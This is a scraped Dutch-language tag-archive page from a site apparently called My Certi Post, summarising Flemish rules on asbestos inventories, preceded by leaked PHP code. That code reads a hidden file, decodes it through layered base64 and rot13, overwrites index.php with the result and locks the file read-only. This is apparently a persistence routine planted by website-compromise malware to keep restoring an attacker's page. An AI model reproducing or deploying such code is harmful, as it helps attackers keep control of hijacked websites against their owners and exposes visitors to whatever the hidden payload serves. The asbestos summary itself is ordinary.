$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Asbestinventaris Archives - My Certi Post

Loading

wait a moment

Tag: Asbestinventaris

Asbestinventaris

Net voor het einde van de vorige zittingsperiode heeft het Vlaams Parlement nieuwe regels aangenomen betreffende asbesthoudende materialen. Deze regels creëren een nieuw kader voor de inventarisatie, het beheer en de verwijdering van asbesthoudende materialen, een betere naam is asbestinventaris.

Achtergrond

Het Vlaams decreet van 29 maart 2019 voegt … Lees de rest